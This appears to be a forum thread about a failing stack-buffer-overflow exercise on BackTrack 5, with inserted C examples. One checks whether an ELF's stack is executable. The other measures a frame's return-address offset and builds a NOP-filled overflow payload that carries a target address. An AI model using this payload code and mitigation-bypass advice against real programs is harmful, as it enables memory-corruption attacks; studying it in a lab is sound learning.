Currently trying to smash the stack under backtrack 5.
I set va_randomize_space to 0
I compile the vulnerable source with gcc and use the flags -fno-stack-protector as well as -z execstack
I'm still unable to smash due to some other stack protection. What else could I be missing?
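Before looking for another protection, it is worth confirming that the binary actually being run carries the flags the compile line asked for. `-z execstack` works by marking the PT_GNU_STACK program header RWE; if that header is RW the kernel maps the stack non-executable and a jump into shellcode on the stack dies with SIGSEGV no matter what else is disabled. The following C program is an added example, not from the original thread: it parses the program headers of an ELF32 or ELF64 file and reports how PT_GNU_STACK is set. The `build_elf32_image` helper constructs minimal header-only ELF images (not loadable binaries) as sample input so the parser can be exercised without a real file; the program name `elfstack` in the usage comment is an assumption.

```c
/* Added example (not from the original thread): inspect PT_GNU_STACK of an
 * ELF file, i.e. whether `-z execstack` took effect. Linux <elf.h> types. */
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return codes of gnu_stack_is_executable(). */
enum { STACK_NX = 0, STACK_EXEC = 1, STACK_NO_HDR = 2, STACK_BAD_ELF = -1 };

/* Walk the program headers of one ELF class, bounds-checked against len,
 * and classify the first PT_GNU_STACK entry found. */
#define SCAN_PHDRS(EhdrT, PhdrT)                                               \
    do {                                                                      \
        EhdrT eh; PhdrT ph;                                                   \
        if (len < sizeof eh) return STACK_BAD_ELF;                            \
        memcpy(&eh, img, sizeof eh);                                          \
        for (uint16_t i = 0; i < eh.e_phnum; i++) {                           \
            size_t off = (size_t)eh.e_phoff + (size_t)i * eh.e_phentsize;     \
            if ((size_t)eh.e_phentsize < sizeof ph || off + sizeof ph > len)  \
                return STACK_BAD_ELF;                                         \
            memcpy(&ph, img + off, sizeof ph);                                \
            if (ph.p_type == PT_GNU_STACK)                                    \
                return (ph.p_flags & PF_X) ? STACK_EXEC : STACK_NX;           \
        }                                                                     \
        return STACK_NO_HDR;                                                  \
    } while (0)

/* STACK_EXEC: PT_GNU_STACK has PF_X (what -z execstack produces).
 * STACK_NX: PT_GNU_STACK present without PF_X (stack mapped non-executable).
 * STACK_NO_HDR: no PT_GNU_STACK header (x86 kernels then default to executable).
 * STACK_BAD_ELF: not a parseable ELF image. */
int gnu_stack_is_executable(const unsigned char *img, size_t len)
{
    if (len < EI_NIDENT || memcmp(img, ELFMAG, SELFMAG) != 0) return STACK_BAD_ELF;
    if (img[EI_CLASS] == ELFCLASS32) SCAN_PHDRS(Elf32_Ehdr, Elf32_Phdr);
    if (img[EI_CLASS] == ELFCLASS64) SCAN_PHDRS(Elf64_Ehdr, Elf64_Phdr);
    return STACK_BAD_ELF;
}

/* Constructed sample input (headers only, not a runnable binary): an ELF32
 * header, a PT_LOAD program header and, when with_gnu_stack is set, a
 * PT_GNU_STACK header carrying stack_flags. Returns the image length, 0 if
 * cap is too small. */
size_t build_elf32_image(unsigned char *out, size_t cap, int with_gnu_stack, uint32_t stack_flags)
{
    Elf32_Ehdr eh;
    Elf32_Phdr ph[2];
    size_t n = sizeof eh + sizeof ph;
    if (cap < n) return 0;
    memset(&eh, 0, sizeof eh);
    memset(ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS32;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_type = ET_EXEC;
    eh.e_machine = EM_386;
    eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof ph[0];
    eh.e_phnum = with_gnu_stack ? 2 : 1;
    ph[0].p_type = PT_LOAD;
    ph[0].p_flags = PF_R | PF_X;
    ph[1].p_type = PT_GNU_STACK;
    ph[1].p_flags = stack_flags;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, ph, sizeof ph);
    return n;
}

/* Run the parser over the three constructed cases; 1 if all classify as expected. */
int self_check(void)
{
    unsigned char img[256];
    size_t n = build_elf32_image(img, sizeof img, 1, PF_R | PF_W);
    int nx = n ? gnu_stack_is_executable(img, n) : -2;
    n = build_elf32_image(img, sizeof img, 1, PF_R | PF_W | PF_X);
    int ex = n ? gnu_stack_is_executable(img, n) : -2;
    n = build_elf32_image(img, sizeof img, 0, 0);
    int none = n ? gnu_stack_is_executable(img, n) : -2;
    return nx == STACK_NX && ex == STACK_EXEC && none == STACK_NO_HDR;
}

/* Usage (name assumed): ./elfstack resultprog */
int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 2; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror(argv[1]); return 2; }
    fseek(f, 0, SEEK_END);
    long sz = ftell(f);
    rewind(f);
    unsigned char *img = sz > 0 ? malloc((size_t)sz) : NULL;
    if (!img || fread(img, 1, (size_t)sz, f) != (size_t)sz) { fprintf(stderr, "read failed\n"); return 2; }
    fclose(f);
    int r = gnu_stack_is_executable(img, (size_t)sz);
    printf("%s: %s\n", argv[1], r == STACK_EXEC ? "PT_GNU_STACK RWE, stack executable"
           : r == STACK_NX ? "PT_GNU_STACK RW, stack is NX (-z execstack did not take effect)"
           : r == STACK_NO_HDR ? "no PT_GNU_STACK header (x86 kernel default: executable)"
           : "not a parseable ELF image");
    free(img);
    return r == STACK_BAD_ELF;
}
```

`readelf -lW resultprog | grep GNU_STACK` gives the same answer from the command line; the point of doing it in code is that the check is against the file on disk, which is the one that matters when a stale build or a different compile line is what actually got run. The same idea applies to the canary: if `readelf -s resultprog` still lists `__stack_chk_fail`, the `-fno-stack-protector` build was not the one being debugged.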
root@bt:~# gcc -g -o resultprog -fno-stack-protector -mpreferred-stack-boundary=2 sourceprog.c
Following those exact steps produces the following results within the image attached.
The very last 4-byte section on the stack is the return address.
Following that, the EBP was pushed onto the stack.
Then an 80-byte buffer was pushed onto the stack.
The problem is that the 80-byte buffer was not the last item pushed onto the stack. 0xb7f77d19 and 0xb7ea22a5 are pushed onto the stack after the 80-byte buffer. No idea what they are.
Either way I am able to overwrite 0xb7e89bd6 with the top of the stack, but then the program receives signal SIGILL.
I've also adjusted my exploit to overwrite the return address with location 0xbffff412, but still the same results occur.
Thanks for the suggestion though. Any other help would be greatly appreciated.
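Two things in the trace above are worth pinning down with code rather than by eye. First, the distance from the start of the buffer to the return address is not necessarily 80 + 4: whatever the compiler places between the buffer and the saved EBP (padding, a canary, spilled registers, or the two words seen here) has to be counted, so the offset should be measured for the actual frame. Second, a SIGILL right after the return address is overwritten typically means the CPU did reach the new EIP and found bytes there that do not decode as instructions, which points at the target address being wrong rather than at the overwrite failing. The following C program is an added example, not code from the thread: `probe_frame` measures the real buffer-to-saved-frame-pointer and buffer-to-return-address distances in a frame with an 80-byte buffer using `__builtin_frame_address(0)`, and `build_payload` emits a payload of exactly that length with the target written little-endian. The target 0xbffff412 is taken from the post as a sample value only; build with `gcc -fno-omit-frame-pointer -fno-stack-protector` so the probe's frame looks like the one being attacked.

```c
/* Added example (not from the original thread): measure where an 80-byte
 * local buffer sits relative to the saved frame pointer and the return
 * address, then size an overflow payload from that measurement. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct frame_layout {
    size_t buf_to_saved_fp; /* bytes from buf[0] up to the saved EBP/RBP slot */
    size_t buf_to_ret;      /* bytes from buf[0] up to the return-address slot */
};

/* A frame shaped like the one in the post: one 80-byte local buffer.
 * __builtin_frame_address(0) is the address of the saved frame pointer;
 * the return address is one machine word above it. Anything the compiler
 * puts between the buffer and the saved frame pointer shows up as
 * buf_to_saved_fp being larger than 80. */
__attribute__((noinline)) struct frame_layout probe_frame(void)
{
    volatile unsigned char buf[80];
    uintptr_t fp = (uintptr_t)__builtin_frame_address(0);
    uintptr_t b = (uintptr_t)buf;
    struct frame_layout l;
    buf[0] = 0; /* touch it so it really lives in this frame */
    l.buf_to_saved_fp = (size_t)(fp - b);
    l.buf_to_ret = l.buf_to_saved_fp + sizeof(void *);
    return l;
}

/* Overflow payload for a buffer whose return-address slot is ret_off bytes
 * from buf[0]: ret_off bytes of 0x90 (x86 NOP) filler, then target in
 * little-endian byte order, one machine word wide. Returns the payload
 * length, or 0 if it does not fit in cap bytes. */
size_t build_payload(unsigned char *out, size_t cap, size_t ret_off, uintptr_t target)
{
    size_t n = ret_off + sizeof target;
    if (cap < n) return 0;
    memset(out, 0x90, ret_off);
    for (size_t i = 0; i < sizeof target; i++)
        out[ret_off + i] = (unsigned char)(target >> (8 * i));
    return n;
}

/* Constructed check: with the naive 80 + 4 offset, the sample address from
 * the post (0xbffff412) must land byte-reversed at offset 84. 1 on success. */
int payload_self_check(void)
{
    unsigned char p[128];
    size_t n = build_payload(p, sizeof p, 84, (uintptr_t)0xbffff412u);
    return n == 84 + sizeof(uintptr_t) && p[0] == 0x90 && p[83] == 0x90 &&
           p[84] == 0x12 && p[85] == 0xf4 && p[86] == 0xff && p[87] == 0xbf;
}

int main(void)
{
    struct frame_layout l = probe_frame();
    unsigned char payload[256];
    printf("buf -> saved frame pointer: %zu bytes, buf -> return address: %zu bytes\n",
           l.buf_to_saved_fp, l.buf_to_ret);
    if (l.buf_to_saved_fp != 80)
        printf("note: %zu extra byte(s) between the buffer and the saved frame pointer\n",
               l.buf_to_saved_fp - 80);
    size_t n = build_payload(payload, sizeof payload, l.buf_to_ret, (uintptr_t)0xbffff412u);
    printf("payload length for this frame: %zu bytes\n", n);
    return 0;
}
```

The numbers the probe prints describe its own frame, so they are only transferable to `resultprog` if the vulnerable function was compiled the same way; the reliable procedure is to read the buffer address and the return-address slot off the real frame in gdb (`info frame` and `x/40wx $esp` in the vulnerable function) and feed that difference to `build_payload`. If the length is right and the program still dies with SIGILL, the value being written is the thing to re-check, byte order included.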